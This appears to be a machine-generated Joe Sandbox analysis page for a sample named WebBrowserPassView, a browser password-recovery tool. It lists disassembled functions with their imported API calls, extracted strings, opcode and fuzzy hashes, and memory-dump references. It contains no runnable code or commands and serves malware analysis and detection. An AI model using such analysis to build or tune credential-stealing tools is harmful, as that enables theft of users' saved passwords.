Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 2396ed8fc361ba4a45bb880d20a87c435b430e1ae6be7f4a73d8f914fd610035
Instruction ID: f65e57152afae8b0dd47d5e8eb23764001e0fb6d1e5383f22b1dcfc0afcde8a7
Opcode Fuzzy Hash: 2396ed8fc361ba4a45bb880d20a87c435b430e1ae6be7f4a73d8f914fd610035
Instruction Fuzzy Hash: BE319072808300AFDB20AF91D84499FB7E8EF84354F04893FFA98A2191D375D948CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040948F Relevance: 15.3, APIs: 12, Instructions: 268COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004094B7

Part of subcall function 0040ACA5: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040121D,?,?,?,?,?,?,?), ref: 0040ACBE

memset.MSVCRT ref: 0040952E
memset.MSVCRT ref: 00409544

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$ByteCharMultiWide
String ID:
API String ID: 290601579-0
Opcode ID: 03c39fb9b8d424ef954cafc48962265f98f5dfa66375acb9161703e9137a6be8
Instruction ID: d523f13bca41d4f63d03b58f3e107dc7881316ec19a855ef67c9f0f82ee91530
Opcode Fuzzy Hash: 03c39fb9b8d424ef954cafc48962265f98f5dfa66375acb9161703e9137a6be8
Instruction Fuzzy Hash: FF9183B2D042199FDF14EFA59C82AEDB7B5AF44314F1404AFF608B6282DB395D44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040A501 Relevance: 15.1, APIs: 10, Instructions: 103COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0040A51A
GetSystemMetrics.USER32 ref: 0040A520
GetDC.USER32(00000000), ref: 0040A52D
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040A53E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040A545
ReleaseDC.USER32 ref: 0040A54C
GetWindowRect.USER32 ref: 0040A55F
GetParent.USER32(?), ref: 0040A564
GetWindowRect.USER32 ref: 0040A581
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A5E0

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: ead36faa3fb79a80cd8612a374053d91ddf5485b81bdcaaea8d99c602293a2a0
Instruction ID: f502094e92981caa4834973bf97846e608375c731a187de988a633f4dd51eeda
Opcode Fuzzy Hash: ead36faa3fb79a80cd8612a374053d91ddf5485b81bdcaaea8d99c602293a2a0
Instruction Fuzzy Hash: C2317076A00209AFDB14CFB8CC85AEEBBB9FB48355F150179E901F3290DA71AD458B60

Uniqueness

Uniqueness Score: -1.00%

Function 004037BE Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403A68
_snwprintf.MSVCRT ref: 00403AFB
_snwprintf.MSVCRT ref: 00403B26
_snwprintf.MSVCRT ref: 00403B51
wcschr.MSVCRT ref: 00403972

Part of subcall function 0040B0B2: wcslen.MSVCRT ref: 0040B0CE
Part of subcall function 0040B0B2: memcpy.MSVCRT ref: 0040B0F1

Part of subcall function 0040AEF6: wcslen.MSVCRT ref: 0040AF08
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF2E
Part of subcall function 0040AEF6: free.MSVCRT(?,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF51
Part of subcall function 0040AEF6: memcpy.MSVCRT ref: 0040AF75

Strings

", xrefs: 0040384D
%I64d, xrefs: 00403AE8, 00403AF7, 00403B22, 00403B4D
", xrefs: 00403BB0

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: _snwprintf$freememcpywcslen$memsetwcschr
String ID: "$"$%I64d
API String ID: 22347003-3439576549
Opcode ID: 3aae806ede33c8050e0075a69791c9792d0727f0dfa2dbb202d8b884bd188424
Instruction ID: 0bf4e81249543337a88649caf9663a23bfc85987250b829cb93633c0d649e96a
Opcode Fuzzy Hash: 3aae806ede33c8050e0075a69791c9792d0727f0dfa2dbb202d8b884bd188424
Instruction Fuzzy Hash: 94D1A172508345AFD710EF55C88199BBBE8FF84308F00493FF591A3191D779EA498B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403037 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00403043
abs.MSVCRT ref: 00403133
abs.MSVCRT ref: 00403163
log.MSVCRT ref: 004031FF
log.MSVCRT ref: 00403210
free.MSVCRT(00000000), ref: 0040322C
free.MSVCRT(?), ref: 0040323E

Strings

, xrefs: 00403069

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: free$wcslen
String ID:
API String ID: 3592753638-3916222277
Opcode ID: 817fdffa1778754f202b473bcf56fa80498cf4c5f79b1c0829f3a8a504be4d4d
Instruction ID: c97d06dd0f2be15faafac33d75df6d0848abc1c3546c13c08877cf69662a8948
Opcode Fuzzy Hash: 817fdffa1778754f202b473bcf56fa80498cf4c5f79b1c0829f3a8a504be4d4d
Instruction Fuzzy Hash: E9616D30C0521ADADF18AF95E4814EEBB79FF08307F60857FE411B6295DB394A81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409D23,?,00000000,?,004101B0,00000000,?,004122A5,00000000), ref: 0040AC45
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409D23,?,00000000,?,004101B0), ref: 0040AC63
wcslen.MSVCRT ref: 0040AC70
wcscpy.MSVCRT ref: 0040AC80
LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409D23,?,00000000,?,004101B0,00000000), ref: 0040AC8A
wcscpy.MSVCRT ref: 0040AC9A

Strings

Unknown Error, xrefs: 0040AC92
netmsg.dll, xrefs: 0040AC40

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: Unknown Error$netmsg.dll
API String ID: 2767993716-572158859
Opcode ID: 65878271f7dde4f835bb4f16d13d15af7b94efba0f9313b390defd79aaf9ef92
Instruction ID: 2c1f00bf4471f0602265d83304054939549967734e239daa98e0476f80b6536b
Opcode Fuzzy Hash: 65878271f7dde4f835bb4f16d13d15af7b94efba0f9313b390defd79aaf9ef92
Instruction Fuzzy Hash: 15014231208210BFFB142B61DE4AEAF7B6CDF01B91F21003AF902B00D1DA385E90D69E

Uniqueness

Uniqueness Score: -1.00%

Function 00408F0A Relevance: 13.9, APIs: 11, Instructions: 137stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408F30
memset.MSVCRT ref: 00408F47
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408F6A
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FC3
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FDA
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FED
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409000
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409013
wcscpy.MSVCRT ref: 00409022
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409062

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: strcpy$ByteCharMultiWidememset$wcscpy
String ID:
API String ID: 4248099071-0
Opcode ID: 3b10a0de6ee468264d86d1eb0d10d9c5d0e098c8a42a896ac47af6df3413975e
Instruction ID: 9fcf6790c625b5749f60fa5132a1aa849aae2f3610ed6a5dc53586237da03b21
Opcode Fuzzy Hash: 3b10a0de6ee468264d86d1eb0d10d9c5d0e098c8a42a896ac47af6df3413975e
Instruction Fuzzy Hash: DA51FCB59007189FDB60DF65C884FDAB7F8BB08314F0045AAE55DE3241DB34AA88CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0043150A Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004315CE
memset.MSVCRT ref: 00431609

Strings

attached databases must use the same text encoding as main database, xrefs: 00431682
cannot ATTACH database within transaction, xrefs: 00431579
database %s is already in use, xrefs: 004315DB
too many attached databases - max %d, xrefs: 00431563
database is already attached, xrefs: 00431634
out of memory, xrefs: 00431778
unable to open database: %s, xrefs: 00431761

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: fc04c1ccaf6d060ca3cb3a4a573306b6aac5391b95642690e4c4f6da1e14753e
Instruction ID: 41aed9512f3f75185fd37d9d4a788dbe0235547fbfc8844ed61f99ff34c0eb5c
Opcode Fuzzy Hash: fc04c1ccaf6d060ca3cb3a4a573306b6aac5391b95642690e4c4f6da1e14753e
Instruction Fuzzy Hash: 6091B670A00305AFDB10DF95C481B9ABBF1EF48308F24945FE8559B362D778E941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E63B Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E428
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E436
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E447
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E45E
Part of subcall function 0040E41C: ??3@YAXPAX@Z.MSVCRT ref: 0040E467

??2@YAPAXI@Z.MSVCRT ref: 0040E67B
??2@YAPAXI@Z.MSVCRT ref: 0040E697
memcpy.MSVCRT ref: 0040E6BC
memcpy.MSVCRT ref: 0040E6D0
??2@YAPAXI@Z.MSVCRT ref: 0040E753
??2@YAPAXI@Z.MSVCRT ref: 0040E75D
??2@YAPAXI@Z.MSVCRT ref: 0040E795

Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
Part of subcall function 0040D5E2: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
Part of subcall function 0040D5E2: memcpy.MSVCRT ref: 0040D6FA

Part of subcall function 0040D5E2: wcscpy.MSVCRT ref: 0040D663
Part of subcall function 0040D5E2: wcslen.MSVCRT ref: 0040D681
Part of subcall function 0040D5E2: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F

Strings

(, xrefs: 0040E71D
d, xrefs: 0040E774

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: ($d
API String ID: 1140211610-1915259565
Opcode ID: 22d640288c57e05958ef48d510536d835924167508facb2840f18c0f6a69e3cb
Instruction ID: 861c2aa1e39ae2bba27ef8b85a75b2e75a9a29af417f25c333be1a6f913ae9ac
Opcode Fuzzy Hash: 22d640288c57e05958ef48d510536d835924167508facb2840f18c0f6a69e3cb
Instruction Fuzzy Hash: 3C517FB1601704AFD724DF2AC486B5AB7F8FF48314F10892EE55ACB391DB74E5408B58

Uniqueness

Uniqueness Score: -1.00%

Function 004197DE Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00419836
Sleep.KERNEL32(00000001), ref: 00419840
GetLastError.KERNEL32 ref: 00419852
UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041992A

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: 14e06bfcd18a1faaafc00e1b2c20e061f42331a31f2f6822b30b51d360152e16
Instruction ID: 6a48cf500290cbfe024f60d9f8fa3e5acb2fed0f29f408aef03af8af8d2d1aa4
Opcode Fuzzy Hash: 14e06bfcd18a1faaafc00e1b2c20e061f42331a31f2f6822b30b51d360152e16
Instruction Fuzzy Hash: 434115B5028301AFE7209F25CC217A7B3E0AFC1714F10092EF5A552390DB79DDC98A1E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A475 Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045EBC0,00419B91,00000000,?,00000000,00000000), ref: 0041A49F
GetFileAttributesW.KERNEL32(00000000), ref: 0041A4A6
GetLastError.KERNEL32 ref: 0041A4B3
Sleep.KERNEL32(00000064), ref: 0041A4C8
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045EBC0,00419B91,00000000,?,00000000,00000000), ref: 0041A4D1
GetFileAttributesA.KERNEL32(00000000), ref: 0041A4D8
GetLastError.KERNEL32 ref: 0041A4E5
Sleep.KERNEL32(00000064), ref: 0041A4FA
free.MSVCRT(00000000), ref: 0041A503

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: File$AttributesDeleteErrorLastSleep$free
String ID:
API String ID: 2802642348-0
Opcode ID: 9713d0eb204f2a511566aa6d075d332d8e1a186ec528611af723e0883a3f4745
Instruction ID: f0aea9e426d4f49770c787e6b61ec6af62ac575cb635bed3fd537f80c1297bc8
Opcode Fuzzy Hash: 9713d0eb204f2a511566aa6d075d332d8e1a186ec528611af723e0883a3f4745
Instruction Fuzzy Hash: 3311063D5062107AC62137306D8D5BF3565879B379B110236EA23922D1DB2C0CE6512F

Uniqueness

Uniqueness Score: -1.00%

Function 00416DE5 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00416E1C
memcpy.MSVCRT ref: 00416E48
memcpy.MSVCRT ref: 00416E62

Strings

<br>, xrefs: 00416E5C
&, xrefs: 00416E42
°, xrefs: 00416E33
<, xrefs: 00416DF9
>, xrefs: 00416E07
", xrefs: 00416E16

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: d67847fae3f197d59aa4d50c09892c40249a44cebd0e4ea6531cd0ad7979b3c5
Instruction ID: d80b0e8a1faee3cf81fd98aea7e87b5c7a6978c7cc7b6d64d1c3866e47b73bb9
Opcode Fuzzy Hash: d67847fae3f197d59aa4d50c09892c40249a44cebd0e4ea6531cd0ad7979b3c5
Instruction Fuzzy Hash: 940180BAE4472061E6312109CC42FF716599B63716FA3472BFD46252C6E18D89C781AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041548C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00413909,00000000,00000000), ref: 004154C7
memset.MSVCRT ref: 00415529
memset.MSVCRT ref: 00415539

Part of subcall function 004153A6: wcscpy.MSVCRT ref: 004153CF

memset.MSVCRT ref: 00415624
wcscpy.MSVCRT ref: 00415645
CloseHandle.KERNEL32(?,9A,?,?,?,00413909,00000000,00000000), ref: 0041569B

Strings

9A, xrefs: 0041566E, 004155AF

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID: 9A
API String ID: 3300951397-4291763745
Opcode ID: cb1afc34fd9e2d64f19af581a3b5eaedaf59f9c3ee057bb96672fc9edb01fa6c
Instruction ID: 195d0570f18187fafaf8b777caec24cc97833dc6dbb2a5a73c5ac716df796b0f
Opcode Fuzzy Hash: cb1afc34fd9e2d64f19af581a3b5eaedaf59f9c3ee057bb96672fc9edb01fa6c
Instruction Fuzzy Hash: 43511971508740EFD720DF25C888ADBBBE9FBC4344F400A2EF99982251DB75D944CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D621
wcscpy.MSVCRT ref: 0040D663

Part of subcall function 0040DAD4: memset.MSVCRT ref: 0040DAE7
Part of subcall function 0040DAD4: _itow.MSVCRT ref: 0040DAF5

wcslen.MSVCRT ref: 0040D681
GetModuleHandleW.KERNEL32(00000000,?,?,?,0040E6FB,?,004121F5,00000000,00000000,?), ref: 0040D68F
LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D6BA
memcpy.MSVCRT ref: 0040D6FA

Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT ref: 0040D57A
Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT ref: 0040D598
Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT ref: 0040D5B6
Part of subcall function 0040D540: ??2@YAPAXI@Z.MSVCRT ref: 0040D5D4

Strings

strings, xrefs: 0040D659

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 83f2c4dafeecc99ee3eef0caec914b4911d667406a77c7368fe1af62c77103f1
Instruction ID: b1470fe84c434e0d92e5d9d764ba88a8e864f1e5bfb716432bcb129c57bfcb41
Opcode Fuzzy Hash: 83f2c4dafeecc99ee3eef0caec914b4911d667406a77c7368fe1af62c77103f1
Instruction Fuzzy Hash: 204160759003019BD71EDF9AED819263365F788306710087AE906972A3DF36EA89CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA19 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040AA3A
_snwprintf.MSVCRT ref: 0040AA6D
wcslen.MSVCRT ref: 0040AA79
memcpy.MSVCRT ref: 0040AA91
wcslen.MSVCRT ref: 0040AA9F
memcpy.MSVCRT ref: 0040AAB2

Strings

%s (%s), xrefs: 0040AA62

Memory Dump Source

Source File: 00000001.00000002.286286663.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286279372.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286346596.000000000045A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286358011.000000000045E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.286365350.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_WebBrowserPassView.jbxd

Yara matches

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)
API String ID: 3979103747-1363028141
Opcode ID: c6bf2ed547002a79412dcf0007d59944c4ad18f5877495ef8b57a3994eba2edc
Instruction ID: b6d6d83be4212d1c483e19f60897e6584e32f0ecf7c368d7e799a2f76849004c
Opcode Fuzzy Hash: c6bf2ed547002a79412dcf0007d59944c4ad18f5877495ef8b57a3994eba2edc
Instruction Fuzzy Hash: 3C216FB2900218ABDF21EF55CD45D8AB7F8FF04358F058466E948AB102EB74EA18CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD46 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DD6B
GetDlgCtrlID.USER32 ref: 0040DD76
